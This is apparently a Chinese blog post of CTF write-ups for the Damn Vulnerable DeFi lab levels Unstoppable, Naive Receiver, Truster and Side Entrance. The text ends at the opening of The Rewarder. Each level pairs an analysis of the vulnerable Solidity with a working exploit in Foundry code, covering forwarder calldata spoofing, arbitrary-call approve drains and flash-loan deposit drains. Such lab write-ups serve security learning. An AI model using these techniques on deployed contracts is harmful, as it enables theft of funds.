<!DOCTYPE html><html lang="zh-Hans"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Damn-vulnerable-defi | Notebook Dispatch</title><meta name="description" content="# Unstoppable 有一个代币化金库，里面存有100万枚DVT代币。在宽限期结束前，它提供免费闪电贷服务。 为了在完全无需许可的情况下发现任何漏洞，开发人员决定在测试网上进行实时测试。他们还设置了监控合约来检查闪电贷功能的运行状况。 player账户余额为 10 个 DV"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link href="https://fonts.googleapis.com/css2?family=Playfair+Display:wght@400;500;600;700&family=Zhi+Mang+Xing&family=Noto+Serif+SC:wght@400;500;700&family=Inter:wght@400;500;600&display=swap" rel="stylesheet"><script>
      (() => {
        try {
          const saved = localStorage.getItem("theme");
          const theme = saved === "dark" || saved === "light"
            ? saved
            : (window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light");
          document.documentElement.setAttribute("data-theme", theme);
        } catch {
          document.documentElement.setAttribute("data-theme", "light");
        }
      })();
    </script><link rel="stylesheet" href="/_astro/_folder_.D0JR-qFn.css"></head> <body class> <!-- 首页导航栏：右侧对齐链接和主题切换 --> <div class="page-shell"> <header class="topbar"> <a class="brand" href="/">Notebook Dispatch</a> <nav class="nav-links"> <a href="/" class>首页</a> <a href="/folders" class>目录</a> <a href="/tags" class>标签</a> <button id="theme-toggle" type="button" aria-label="切换主题"> <span class="theme-icon theme-sun">☼</span> <span class="theme-icon theme-moon">☾</span> </button> </nav> </header> </div> <main id="main-content" class="page-shell page-main">  <article class="article-shell"> <a class="back-link" href="/">&larr; 返回首页花园</a> <header class="article-header"> <p class="eyebrow">2026/4/14</p> <h1>Damn-vulnerable-defi</h1> <p class="lead"># Unstoppable 有一个代币化金库，里面存有100万枚DVT代币。在宽限期结束前，它提供免费闪电贷服务。 为了在完全无需许可的情况下发现任何漏洞，开发人员决定在测试网上进行实时测试。他们还设置了监控合约来检查闪电贷功能的运行状况。 player账户余额为 10 个 DV</p>  <div class="tag-row" style="justify-content: center; margin-bottom: 24px;">  </div> </header> <div class="article-content"><h1>Unstoppable</h1>
<p>有一个代币化金库，里面存有100万枚DVT代币。在宽限期结束前，它提供免费闪电贷服务。</p>
<p>为了在完全无需许可的情况下发现任何漏洞，开发人员决定在测试网上进行实时测试。他们还设置了监控合约来检查闪电贷功能的运行状况。</p>
<p>player账户余额为 10 个 DVT 代币，证明可以关闭金库。金库必须停止提供闪电贷服务</p>
<p>你起始有 10 DVT，目标是让 Vault 停止提供闪电贷服务（<code>flashLoan</code> 调用失败，Monitor 触发暂停）。</p>
<h2>漏洞点</h2>
<h3>UnstoppableVault</h3>
<p><code>UnstoppableVault</code> 是一个 ERC4626 vault + ERC3156 闪电贷出借方 + Pausable</p>
<p>关键点：</p>
<ul>
<li><code>totalAssets()</code> 返回 <code>asset.balanceOf(address(this))</code>（直接读 Token 余额），如果你不通过 <code>deposit</code>，而是直接通过 <code>transfer</code> 把代币转给合约（“强制喂食”），<code>totalAssets()</code> 会增加，但 <code>totalSupply()</code> 不会变。</li>
<li>ERC4626 的 share 与 asset 之间的转换由 <code>convertToShares</code>/<code>convertToAssets</code> 负责</li>
<li>flashLoan 的关键检查：</li>
</ul>
<pre><code class="language-solidity">
function flashLoan(IERC3156FlashBorrower receiver, address _token, uint256 amount, bytes calldata data)
external
returns (bool)
{
  if (amount == 0) revert InvalidAmount(0); // 早期失败：借款量不能为 0
  if (address(asset) != _token) revert UnsupportedCurrency(); // 强制 ERC3156 规范：资产必须匹配
  uint256 balanceBefore = totalAssets();
  // 校验：将 totalSupply 按照 ERC4626 转换为 shares 后，应等于实际资产余额
  // 这是一个关键的安全检查，若不匹配说明内部会计错乱
  if (convertToShares(totalSupply) != balanceBefore) revert InvalidBalance(); // enforce ERC4626 requirement

  // 将代币转给 borrower，并执行回调
  ERC20(_token).safeTransfer(address(receiver), amount);

  // 计算费用并执行回调
  uint256 fee = flashFee(_token, amount);
  if (
    receiver.onFlashLoan(msg.sender, address(asset), amount, fee, data)
    != keccak256(&quot;IERC3156FlashBorrower.onFlashLoan&quot;)
  ) {
    // 回调未返回正确的魔数，视为失败
    revert CallbackFailed();
  }

  // 从 borrower 拉回本金 + 费用（需要 borrower 允许金库转移）
  ERC20(_token).safeTransferFrom(address(receiver), address(this), amount + fee);
  // 将费用支付给 feeRecipient
  ERC20(_token).safeTransfer(feeRecipient, fee);

  return true;
}
</code></pre>
<p>注意这句：</p>
<pre><code class="language-solidity">if (convertToShares(totalSupply) != balanceBefore)
revert InvalidBalance();
</code></pre>
<p>含义是：</p>
<p>Vault 认为：用当前总 share 数量 <code>totalSupply</code> 换算出的 asset 数量，应该等于 Vault 实际持有的 asset 余额 <code>totalAssets()</code>。</p>
<p>这在“所有资产都通过 <code>deposit</code>/<code>mint</code> 流入 Vault”时是成立的。</p>
<h3>UnstoppableMonitor（监控 + 暂停）</h3>
<p><code>UnstoppableMonitor</code> 实现了 <code>IERC3156FlashBorrower</code>，用来检测 Vault 是否还能正常闪电贷</p>
<p>伪代码逻辑：</p>
<pre><code class="language-solidity">function checkFlashLoan(uint256 amount) external {
  try vault.flashLoan(
    IERC3156FlashBorrower(address(this)),
    address(vault.asset()),
    amount,
    &quot;&quot;
  ) {
    emit FlashLoanStatus(true);
  } catch {
    // 闪电贷失败 -&gt; 直接暂停 Vault，并把所有权转回 deployer
    vault.setPause(true);
    vault.transferOwnership(deployer);
    emit FlashLoanStatus(false);
  }
}
</code></pre>
<p>测试里：</p>
<ul>
<li><code>setUp()</code> 里先由 <code>deployer</code> 调用一次 <code>checkFlashLoan(100e18)</code>，确保一开始是成功的（<code>FlashLoanStatus(true)</code>）</li>
<li><code>_isSolved()</code> 再由 <code>deployer</code> 调用一次 <code>checkFlashLoan(100e18)</code>，此时必须失败才算过关</li>
</ul>
<p>因此，本关的本质目标是：找到一种方式，让后续任何 <code>flashLoan</code> 都因为 <code>revert</code> 而失败。</p>
<h2>wp</h2>
<pre><code class="language-solidity">    function test_unstoppable() public checkSolvedByPlayer {
        // 转账一定数量的 DVT 到 vault，改变 totalAssets，但不改变 totalSupply
        // 打印转账后的状态，查看 vault 的 totalAssets 和 totalSupply
        console.log(&quot;before attack!!!!!!!!!!!!!&quot;);
        console.log(&quot;vault totalAssets():&quot;, vault.totalAssets());
        console.log(&quot;vault totalSupply():&quot;, vault.totalSupply());
        console.log(&quot;convertToShares(totalSupply):&quot;,     
        vault.convertToShares(vault.totalSupply()));    
        console.log(&quot;after attack!!!!!!!!!!!!!!&quot;);
        token.transfer(address(vault), 1);// 假设转 1 DVT 给 vault
        console.log(&quot;Vault totalAssets():&quot;, vault.totalAssets());
        console.log(&quot;Vault totalSupply():&quot;, vault.totalSupply());
        console.log(&quot;convertToShares(totalsupply):&quot;, 
        vault.convertToShares(vault.totalSupply()));
    }
</code></pre>
<h1>Naive Receiver (Context Confusion 上下文混淆)</h1>
<p>There’s a pool with 1000 WETH in balance offering flash loans. It has a fixed fee of 1 WETH. The pool supports meta-transactions by integrating with a permissionless forwarder contract.</p>
<p>A user deployed a sample contract with 10 WETH in balance. Looks like it can execute flash loans of WETH.</p>
<p>All funds are at risk! Rescue all WETH from the user and the pool, and deposit it into the designated recovery account.
关卡情报</p>
<ul>
<li><strong>场景：</strong> 有一个闪电贷资金池 (<code>NaiveReceiverLenderPool</code>)，它提供 ETH 闪电贷，每次贷款收取固定的 <strong>1 ETH 手续费</strong>。</li>
<li><strong>受害者：</strong> 有一个不知情的合约 (<code>FlashLoanReceiver</code>)，它目前持有 <strong>10 ETH</strong>。这个合约实现了闪电贷接收接口，意味着它可以接收闪电贷。</li>
<li><strong>目标：</strong> 榨干受害者合约里的所有 10 ETH，直到它余额归零。最后提款到指定账户</li>
<li><strong>你的资源：</strong> 你几乎身无分文（或者说不需要花自己的钱）。</li>
</ul>
<h2>审计漏洞</h2>
<h3>第一步：鸟瞰全貌 (Reconnaissance)</h3>
<p><strong>目的</strong>：不看具体逻辑，先弄清楚“这合约是干嘛的？”、“它依赖谁？”。</p>
<ol>
<li><p><strong>看名字</strong>：<code>NaiveReceiverPool</code> -&gt; 一个池子，可能和“天真（Naive）”的接收者有关。</p>
</li>
<li><p><strong>看继承 (Inheritance)</strong>：</p>
<pre><code class="language-solidity">contract NaiveReceiverPool is Multicall, IERC3156FlashLender
</code></pre>
<ul>
<li><p><strong><code>IERC3156FlashLender</code></strong>：这是一个闪电贷借出方。我知道它一定有 <code>flashLoan</code> 函数。</p>
</li>
<li><p><strong><code>Multicall</code></strong>：这是一个由 OpenZeppelin 或 Solady 提供的功能，允许在一个交易里批量调用函数。<strong>（警觉：这通常是组合攻击的入口）</strong>。</p>
</li>
</ul>
</li>
<li><p><strong>看 Import</strong>：</p>
<ul>
<li><p><code>WETH</code>：它只处理 Wrapped ETH，不是原生 ETH。</p>
</li>
<li><p><code>FlashLoanReceiver</code>：它会和这个接收者合约交互。</p>
</li>
</ul>
</li>
</ol>
<p><strong>第一步结论</strong>：这是一个只借出 WETH 的闪电贷池子，支持批量调用。</p>
<hr>
<h3>第二步：找“钱”在哪 (Follow the Money)</h3>
<p><strong>目的</strong>：合约最危险的地方就是资金进出的地方。找到存储资金的变量。</p>
<ol>
<li><p><strong>状态变量 (State Variables)</strong>：</p>
<pre><code class="language-Solidity">uint256 private constant FIXED_FEE = 1e18; // 1 ETH
WETH public immutable weth;
mapping(address =&gt; uint256) public deposits;
uint256 public totalDeposits;
</code></pre>
<ul>
<li><p><strong>审计嗅觉</strong>：<code>FIXED_FEE = 1 ETH</code>。<strong>太贵了！</strong> 借 1 块钱也要付 1 ETH 手续费？这绝对是经济模型设计上的隐患。</p>
</li>
<li><p><strong>资金流向</strong>：资金是 <code>WETH</code>，内部用 <code>deposits</code> 记账。</p>
</li>
</ul>
</li>
</ol>
<hr>
<h3>第三步：核心逻辑审计 (Core Business Logic)</h3>
<p><strong>目的</strong>：盯着最复杂的那个函数看。在闪电贷合约里，就是 <code>flashLoan</code>。</p>
<p>我们要逐行“翻译”它的行为，并扮演<strong>恶意用户</strong>的角色。</p>
<pre><code class="language-solidity">function flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)
    external
    returns (bool)
{
    // ... 省略代币检查 ...

    // 动作 1: 给钱
    weth.transfer(address(receiver), amount);

    // 动作 2: 外部调用 (External Call) -&gt; ⚠️ 高危区域
    // 这里的 msg.sender 是我（攻击者），但 receiver 是受害者地址
    // 关键点：合约没有检查 receiver 是否等于 msg.sender！
    if (receiver.onFlashLoan(msg.sender, address(weth), amount, FIXED_FEE, data) != CALLBACK_SUCCESS) {
        revert CallbackFailed();
    }

    // 动作 3: 收钱 + 强制收税
    uint256 amountWithFee = amount + FIXED_FEE;
    weth.transferFrom(address(receiver), address(this), amountWithFee);

    // ... 省略记账 ...
    return true;
}
</code></pre>
<p><strong>审计自问自答（关键步骤）</strong>：</p>
<ul>
<li><p><strong>Q1: 谁能调用 <code>flashLoan</code>?</strong></p>
<ul>
<li>A: <code>external</code> 修饰，任何人都能调用。我是黑客，我能调用。</li>
</ul>
</li>
<li><p><strong>Q2: 我调用的时候，<code>receiver</code> 参数能填别人吗？</strong></p>
<ul>
<li>A: 代码里没有 <code>require(receiver == msg.sender)</code>。所以我可以填任何实现了 <code>onFlashLoan</code> 接口的合约地址（比如那个“天真的接收者”）。</li>
</ul>
</li>
<li><p><strong>Q3: 谁付钱？</strong></p>
<ul>
<li>A: <code>weth.transferFrom(address(receiver), ...)</code>。代码强制从 <code>receiver</code> 也就是受害者那里扣钱。</li>
</ul>
</li>
<li><p><strong>Q4: 我如果借款金额 <code>amount</code> 填 0 会怎样？</strong></p>
<ul>
<li>A: 手续费是 <code>FIXED_FEE</code> (1 ETH)。即使借 0，受害者也要付 1 ETH。</li>
</ul>
</li>
</ul>
<p><strong>第三步结论</strong>：发现逻辑漏洞！我可以发起交易，指定别人当冤大头付手续费。</p>
<hr>
<h3>第四步：组合攻击 (Check for Combinations)</h3>
<p><strong>目的</strong>：回到第一步看到的 <code>Multicall</code>。</p>
<ul>
<li><p>单次攻击：我调用一次 <code>flashLoan</code>，受害者亏 1 ETH。</p>
</li>
<li><p>既然继承了 <code>Multicall</code>，我能不能在一个交易里调用 10 次 <code>flashLoan</code>？</p>
<ul>
<li>完全可以。这样一笔交易的 Gas 费就能耗尽受害者 10 ETH。效率极高。</li>
</ul>
</li>
</ul>
<h3>第五步：利用上下文混淆withdraw提取所有余额</h3>
<p>wp中当执行 <code>calls[10] = abi.encodePacked(withdrawOp, deployer);</code> 时，构造的数据流（Payload）在内存中长这样：</p>
<pre><code>|------------ 标准 withdraw 调用数据 (withdrawOp) --------|--- 附加数据 ---|
|  Selector|    Amount (32字节)      |   Receiver (32字节)  |   Deployer   |
|  4字节   | 000...0003f2 (1010 ETH) | 000...recovery_addr |  20字节地址   |
</code></pre>
<p>当这段数据被传入 <code>pool.withdraw</code> 执行时，发生了以下两件事：</p>
<h4><code>withdraw</code> 函数的视角 (正常的参数解析)</h4>
<p>Solidity 的 ABI 解码规则有一个特性：<strong>忽略尾部多余数据 (Ignore Trailing Garbage)</strong></p>
<p><code>withdraw(uint256 amount, address receiver)</code> 函数只需要读取前 4+32+32 个字节。它读完 <code>receiver</code> 后，认为任务完成了，<strong>根本不关心后面是不是还粘着一个 deployer 地址</strong>。</p>
<ul>
<li><p><code>amount</code>: 解析成功 </p>
</li>
<li><p><code>receiver</code>: 解析成功 </p>
</li>
<li><p>后面多余的 20 字节：直接无视</p>
</li>
</ul>
<h4><code>_msgSender()</code> 函数的视角 (特殊的身份解析)</h4>
<p>在 <code>withdraw</code> 内部，执行到了 <code>deposits[_msgSender()] -= amount;</code>。 这时，<code>_msgSender()</code> 被调用了。</p>
<pre><code class="language-solidity">function _msgSender() internal view override returns (address) {
    // 条件1: 调用者是 trustedForwarder (我们通过 Forwarder 发起的，满足)
    if (msg.sender == trustedForwarder &amp;&amp; msg.data.length &gt;= 20) {
        // 条件2: 截取 msg.data 的最后 20 个字节作为“真实发送者”
        return address(bytes20(msg.data[msg.data.length - 20:])); 
    }
    // ...
}
</code></pre>
<ul>
<li><p><strong><code>msg.data</code> 是什么？</strong> 由于 <code>Multicall</code> 使用了 <code>delegatecall</code>，当执行到第 11 个操作时，<code>msg.data</code> 正是我们构造的那串 <strong>&quot;withdrawOp + deployer&quot;</strong>。</p>
</li>
<li><p><strong>切片操作</strong>： 它直接跳到数据流的最末尾，切下了那 20 个字节。</p>
</li>
<li><p><strong>结果</strong>： 它读到了我们粘上去的 <code>deployer</code> 地址！
<code>setUp</code> 函数揭示<code>deployer</code> 是金主：Pool 里的初始 1000 WETH 和赚到的 10 WETH 手续费，在账本上都归 <code>deployer</code> 所有。</p>
</li>
</ul>
<h2>wp</h2>
<pre><code class="language-solidity">    function test_naiveReceiver() public checkSolvedByPlayer {

        // --- 1. 准备攻击数据 ---
        // 构造 Multicall 需要的 11 个调用：前 10 次是刷空受害者，第 11 次是提干池子

        bytes[] memory calls = new bytes[](11);

        // 1~10: 借贷 0 元，强制对方付手续费
        bytes memory flashOp = abi.encodeCall(pool.flashLoan, (receiver, address(weth), 0, &quot;&quot;));
        for(uint i = 0; i &lt; 10; i++) calls[i] = flashOp;

  

        // 11: 伪造提款请求 (关键：在 withdraw 数据后拼接 deployer 地址欺骗 Pool)
        uint256 amount = WETH_IN_POOL + WETH_IN_RECEIVER;
        bytes memory withdrawOp = abi.encodeCall(pool.withdraw, (amount, payable(recovery)));

        calls[10] = abi.encodePacked(withdrawOp, deployer);

  

        // 打包成 Multicall 数据
        bytes memory multicallData = abi.encodeCall(pool.multicall, (calls));

        // --- 2. 构造转发请求 (EIP-712) ---
        BasicForwarder.Request memory req = BasicForwarder.Request({
            from: player,
            target: address(pool),
            value: 0,
            gas: 30000000,
            nonce: forwarder.nonces(player),
            data: multicallData,
            deadline: block.timestamp + 1
        });

        // --- 3. 签名与执行 ---
        // 计算 StructHash
        bytes32 typeHash = keccak256(&quot;Request(address from,address target,uint256 value,uint256 gas,uint256 nonce,bytes data,uint256 deadline)&quot;);

        bytes32 structHash = keccak256(abi.encode(
            typeHash, req.from, req.target, req.value, req.gas, req.nonce, keccak256(req.data), req.deadline
        ));

        // 计算 Digest (EIP-712 标准头 + 域分隔符 + StructHash)
        bytes32 digest = keccak256(abi.encodePacked(&quot;\x19\x01&quot;, forwarder.domainSeparator(), structHash));

        // 签名并发送
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(playerPk, digest);
        forwarder.execute(req, abi.encodePacked(r, s, v));
    }
</code></pre>
<h1>Truster</h1>
<p>越来越多的贷款池开始提供闪贷。在这种情况下，一个新的池已经启动，免费提供DVT代币闪贷。</p>
<p>该池持有100万个DVT代币。你什么都没有。</p>
<p>为了通过这个挑战，拯救池中的所有资金，执行单个交易。将资金存入指定的回收账户。</p>
<p>收到，让我们按照**“五步法”**审计标准，立即对 <code>TrusterLenderPool</code> 进行安全分析。</p>
<hr>
<h3>第一步：鸟瞰全貌 (Reconnaissance)</h3>
<ul>
<li><p><strong>合约名</strong>: <code>TrusterLenderPool</code> 1。暗示了某种“信任”关系，通常在安全领域，“Trust”往往意味着“过度信任”或“权限过大”。</p>
</li>
<li><p><strong>继承</strong>: <code>ReentrancyGuard</code> 2。这说明开发者意识到了重入攻击的风险，并使用了 OpenZeppelin 的标准库来防御。</p>
</li>
<li><p><strong>库的使用</strong>: <code>using Address for address;</code> 3。引入了 OpenZeppelin 的 <code>Address</code> 库，这通常意味着会用到 <code>.functionCall</code> 这种低级调用封装。</p>
</li>
<li><p><strong>核心功能</strong>: 提供 Flash Loan（闪电贷）服务。</p>
</li>
</ul>
<p><strong>初步结论</strong>：这是一个标准的闪电贷池，防了重入，但名字里的 &quot;Truster&quot; 让人不安。</p>
<hr>
<h3>第二步：资金锚定 (Follow the Money)</h3>
<ul>
<li><p><strong>核心资产</strong>: <code>DamnValuableToken public immutable token;</code> 4。</p>
</li>
<li><p><strong>余额检查</strong>: 合约没有使用 <code>mapping</code> 记账，而是直接在 <code>flashLoan</code> 中通过 <code>token.balanceOf(address(this))</code> 检查余额变化 5。</p>
</li>
<li><p><strong>目标</strong>: 我们的目标是把池子里的 <code>token</code> 搬空。</p>
</li>
</ul>
<hr>
<h3>第三步：核心逻辑精读 (Core Business Logic)</h3>
<p>我们聚焦于唯一的业务函数 <code>flashLoan</code>。让我们扮演攻击者进行拷问：</p>
<pre><code class="language-solidity">function flashLoan(uint256 amount, address borrower, address target, bytes calldata data)
    external
    nonReentrant
    returns (bool)
{
    // 记录闪电贷之前的余额
    uint256 balanceBefore = token.balanceOf(address(this));

    // 1. 给钱：把 token 转给借款人
    token.transfer(borrower, amount);

    // 2. 外部调用：执行 target 上的任意代码
    target.functionCall(data); // &lt;--- !!! 极其可疑

    // 3. 检查还款：只要余额不减少就行
    if (token.balanceOf(address(this)) &lt; balanceBefore) {
        revert RepayFailed();
    }

    return true;
}
</code></pre>
<p><strong>Attacker Mindset 自问自答：</strong></p>
<ul>
<li><p><strong>Q1: 谁能调？</strong> <code>external</code> 修饰，任何人都能调 6。</p>
</li>
<li><p><strong>Q2: 参数受控吗？</strong> <code>amount</code>, <code>borrower</code>, <code>target</code>, <code>data</code> 全部由我（攻击者）传入，完全受控 7。</p>
</li>
<li><p><strong>Q3: 谁付钱？</strong> 只要最后余额没少，不需要额外付手续费。</p>
</li>
<li><p><strong>Q4: 外部调用在哪？</strong> 就在 <code>target.functionCall(data)</code> 8。</p>
</li>
</ul>
<hr>
<h3>第四步：威胁建模 (Threat Modeling)</h3>
<p>我们发现了绝对的高危操作：<strong>任意外部调用 (Arbitrary External Call)</strong>。</p>
<p>漏洞点分析：</p>
<p>代码行：target.functionCall(data); </p>
<ol>
<li><p>身份 (Context)：</p>
<p> 当这一行代码执行时，是谁在发起调用？</p>
<p> 是 TrusterLenderPool 合约自己。也就是说，msg.sender 是池子的地址。</p>
</li>
<li><p>能力 (Capability)：</p>
<p> 由于 target 和 data 是我们可以控制的，我们可以让池子以它自己的身份，去调用任何合约的任何函数。</p>
</li>
<li><p><strong>攻击向量构思</strong>：</p>
<ul>
<li><p>如果我们借款 <code>amount = 0</code>，那么 <code>balanceBefore</code> 等于当前余额。</p>
</li>
<li><p>只要我们执行的操作不减少池子的余额，第3步的检查就能通过。</p>
</li>
<li><p><strong>关键问题</strong>：有什么操作是不移动资金，但能让我们获利的？</p>
</li>
<li><p><strong>答案</strong>：<strong>ERC-20 的 <code>approve</code> (授权)</strong>。</p>
</li>
</ul>
</li>
</ol>
<p><strong>攻击剧本</strong>：</p>
<ol>
<li><p>调用 <code>flashLoan</code>。</p>
<ul>
<li><p><code>amount</code>: 0</p>
</li>
<li><p><code>target</code>: <strong>DVT Token 合约地址</strong></p>
</li>
<li><p><code>data</code>: <code>approve(attacker, 1000000 ether)</code> 的编码数据</p>
</li>
</ul>
</li>
<li><p><strong>执行过程</strong>：</p>
<ul>
<li><p>池子调用 <code>token.approve(attacker, 100W)</code>。</p>
</li>
<li><p>此时，Token 合约里的 <code>allowance[pool][attacker]</code> 变成了 100W。</p>
</li>
<li><p>池子余额未变，Flash Loan 检查通过。</p>
</li>
</ul>
</li>
<li><p><strong>收割</strong>：</p>
<ul>
<li><p>交易结束后，攻击者调用 <code>token.transferFrom(pool, attacker, 1000000 ether)</code>。</p>
</li>
<li><p>因为已经获得了授权，资金被瞬间转走。</p>
</li>
</ul>
</li>
</ol>
<hr>
<h2>wp</h2>
<pre><code class="language-solidity">    function test_truster() public checkSolvedByPlayer {

        // 攻击合约在最底部，部署攻击合约，所有攻击逻辑都在 constructor 中自动执行
        // 这只算作1笔交易可以通过验证
        new TrusterExploit(
            address(pool),
            address(token),
            recovery,
            TOKENS_IN_POOL
        );
    }
    
// 🔥 攻击合约：一击必杀
contract TrusterExploit {

    constructor(address pool, address token, address recovery, uint256 amount) {

        // (target)是 token 合约
        //调用 token 合约，执行 approve
        bytes memory data = abi.encodeCall(DamnValuableToken(token).approve, (address(this), amount)); //授权给攻击合约自己

        TrusterLenderPool(pool).flashLoan(0, address(this), token, data);

        // 2. 收网：现在攻击合约拥有了支配权，直接转账
        DamnValuableToken(token).transferFrom(pool, recovery, amount);
    }
}
</code></pre>
<h1>side-entrance</h1>
<p>一个令人惊讶的简单池允许任何人存入ETH，并在任何时间点提取它。</p>
<p>它已经有1000个ETH余额，并且正在使用存入的ETH提供免费闪贷来推广他们的系统。</p>
<p>一开始你有1个ETH的余额。通过从池中拯救所有ETH并将其存入指定的回收账户来通过挑战。</p>
<hr>
<h3>第一步：鸟瞰全貌 (Bird&#39;s Eye View)</h3>
<p><strong>目的</strong>：快速定位合约角色与工具。</p>
<ul>
<li><p><strong>看名字</strong>：<code>SideEntranceLenderPool</code>（侧门借贷池）。</p>
<ul>
<li><strong>暗示</strong>：这像是一个隐喻。正门可能有守卫（检查），但也许我们可以通过“侧门”把钱运出去。</li>
</ul>
</li>
<li><p><strong>看引入</strong>：</p>
<ul>
<li><p><code>import {SafeTransferLib} from &quot;solady/utils/SafeTransferLib.sol&quot;;</code></p>
</li>
<li><p>使用了我们刚才讨论过的 <strong>Solady</strong> 库。</p>
</li>
<li><p><strong>注意</strong>：<code>withdraw</code> 函数使用了 <code>SafeTransferLib.safeTransferETH</code>，这意味着转账是安全的，且处理了返回值，但它不管业务逻辑对不对。</p>
</li>
</ul>
</li>
<li><p><strong>看接口</strong>：</p>
<ul>
<li><code>IFlashLoanEtherReceiver</code>：定义了 <code>execute</code> 函数。这是闪电贷回调的标准模式。</li>
</ul>
</li>
</ul>
<hr>
<h3>第二步：资金锚定 (Follow the Money)</h3>
<p><strong>目的</strong>：锁定金库位置，区分“物理资金”和“账本资金”。</p>
<p>这是这一关最核心的地方，请务必仔细区分：</p>
<ol>
<li><p><strong>物理资金 (Reality)</strong>：</p>
<ul>
<li><code>address(this).balance</code>：合约实际上持有的 ETH 总量。</li>
</ul>
</li>
<li><p><strong>账本资金 (Accounting)</strong>：</p>
<ul>
<li><code>mapping(address =&gt; uint256) public balances</code>：合约在小本本上记下来的“谁拥有多少钱”。</li>
</ul>
</li>
</ol>
<p><strong>关键问题</strong>：这两个系统是强绑定的吗？</p>
<ul>
<li><p>在 <code>deposit()</code> 中：你给物理资金（msg.value），账本给你记账。✅ 绑定。</p>
</li>
<li><p>在 <code>withdraw()</code> 中：账本销账（delete），物理资金给你。✅ 绑定。</p>
</li>
<li><p><strong>漏洞嗅觉</strong>：如果这两个系统在某一刻<strong>解绑</strong>了，或者我们可以利用其中一个系统去欺骗另一个系统，漏洞就出现了。</p>
</li>
</ul>
<hr>
<h3>第三步：核心逻辑精读 (Core Business Logic)</h3>
<p><strong>目的</strong>：死磕 <code>flashLoan</code> 和 <code>deposit</code>。</p>
<p><strong>扮演攻击者 (Attacker Mindset) 自问自答</strong>：</p>
<h4>1. 分析 <code>flashLoan</code></h4>
<pre><code class="language-solidity">function flashLoan(uint256 amount) external {
    uint256 balanceBefore = address(this).balance; // 1. 记下现在的物理余额

    // 2. 把钱借给借款人 (msg.sender)
    // 注意：这里把控制权交给了借款人的 execute 函数
    IFlashLoanEtherReceiver(msg.sender).execute{value: amount}();

    // 3. 检查还款
    // 关键点：它只检查“物理余额”有没有恢复，不关心钱是怎么回来的！
    if (address(this).balance &lt; balanceBefore) {
        revert RepayFailed();
    }
}
</code></pre>
<h4>2. 分析 <code>deposit</code></h4>
<pre><code class="language-solidity">
function deposit() external payable {
    // 收钱，并记在发送者名下
    balances[msg.sender] += msg.value;
}
</code></pre>
<h4>3. 连线思考</h4>
<ul>
<li><p><strong>Q1: 谁能调？</strong> 所有人。</p>
</li>
<li><p><strong>Q2: 参数受控吗？</strong> <code>amount</code> 受控。</p>
</li>
<li><p><strong>Q3: 外部调用在哪？</strong> <code>execute()</code> 回调。</p>
</li>
<li><p><strong>Q4 (致命问题):</strong> 闪电贷要求我还钱，但我必须通过“还款函数”还吗？</p>
<ul>
<li><p>代码里<strong>没有</strong>专门的 <code>repay()</code> 函数。</p>
</li>
<li><p>只要合约里的 ETH 总量回去了就行。</p>
</li>
</ul>
</li>
</ul>
<hr>
<h3>第四步：威胁建模 (Threat Modeling)</h3>
<p><strong>目的</strong>：构建攻击路径。</p>
<ul>
<li><p><strong>逻辑漏洞 (Business Logic Flaw)</strong>：</p>
<ul>
<li><p>池子的 <code>flashLoan</code> 检查机制太“单纯”了：它只看 <code>address(this).balance</code>。</p>
</li>
<li><p>池子的 <code>deposit</code> 机制太“死板”了：只要给钱，就记账。</p>
</li>
</ul>
</li>
<li><p><strong>攻击剧本 (The Heist)</strong>：</p>
<ol>
<li><p><strong>借款</strong>：我申请 Flash Loan，借走池子里所有的 1000 ETH。</p>
<ul>
<li><p>池子余额：0。</p>
</li>
<li><p>我手里：1000 ETH。</p>
</li>
</ul>
</li>
<li><p><strong>“左手倒右手”</strong>：在 <code>execute</code> 回调里，我拿着这借来的 1000 ETH，调用 <code>pool.deposit()</code>。</p>
<ul>
<li><p><strong>物理层</strong>：钱回到了池子。池子余额恢复 1000 ETH。✅ <code>flashLoan</code> 检查通过！</p>
</li>
<li><p><strong>账本层</strong>：池子在 <code>balances</code> 里记下：攻击者存入了 1000 ETH。📝</p>
</li>
</ul>
</li>
<li><p><strong>提款</strong>：Flash Loan 交易结束后，我调用 <code>pool.withdraw()</code>。</p>
<ul>
<li>因为账本上写着我有 1000 ETH，池子把钱转给了我。</li>
</ul>
</li>
<li><p><strong>结果</strong>：池子被掏空，钱全归我。</p>
</li>
</ol>
</li>
</ul>
<p>这就是所谓的 <strong>“侧门 (Side Entrance)”</strong>：我不走正门（还款），而是走侧门（存款）把钱还回去，同时骗取了存款凭证。</p>
<hr>
<h2>wp</h2>
<pre><code class="language-solidity">    /**
     * CODE YOUR SOLUTION HERE
     */
    function test_sideEntrance() public checkSolvedByPlayer {
        SideEntranceExploit exploit = new SideEntranceExploit(address(pool), recovery);
        exploit.attack(ETHER_IN_POOL);
    }

----------------------------------------------
//SPDX-License-Identifier: MIT
pragma solidity=0.8.25;

import {Test, console} from &quot;forge-std/Test.sol&quot;;
import {SideEntranceLenderPool} from &quot;../../src/side-entrance/SideEntranceLenderPool.sol&quot;;

contract SideEntranceExploit{
    SideEntranceLenderPool pool;
    address recovery;
        
    constructor(address _pool, address _recovery) {
        pool = SideEntranceLenderPool(_pool);
        recovery = _recovery;
    }
    
    function execute() external payable {
        pool.deposit{value: msg.value}();
    }

    function attack(uint256 amount) public payable {
        pool.flashLoan(amount);
        pool.withdraw();

        //搬空池子，把eth转到recovery账户
        (bool success, ) = recovery.call{value: address(this).balance}(&quot;&quot;);
        require(success, &quot;Transfer failed&quot;);
    }
    receive() external payable {}//必须添加：接收 ETH 的回退函数

}
</code></pre>
<h1>the rewarder（默克尔证明 ，位图）</h1>
<p>合约是分配该死的有价值的代币和WETH的奖励。
为了获得奖励，用户必须证明他们被包括在选定的受益人集合中。不过不用担心汽油。该合约已经过优化，允许在同一笔交易中申请多个令牌。
爱丽丝已经得到了她的奖赏。你也可以索要你的！但你已经意识到合同中有一个致命的漏洞。
尽可能多地从经销商那里省钱。将所有回收的资产转入指定的回收账户。</p>
<p>有一个流动性挖矿池子，它会给提供流动性的用户分发 <strong>Reward Token</strong>。分发的规则看似很公平：“你存的越多，持有的时间越久，奖励越多”。每隔固定时间（比如 5 天）开启新的一轮奖励分发。</p>
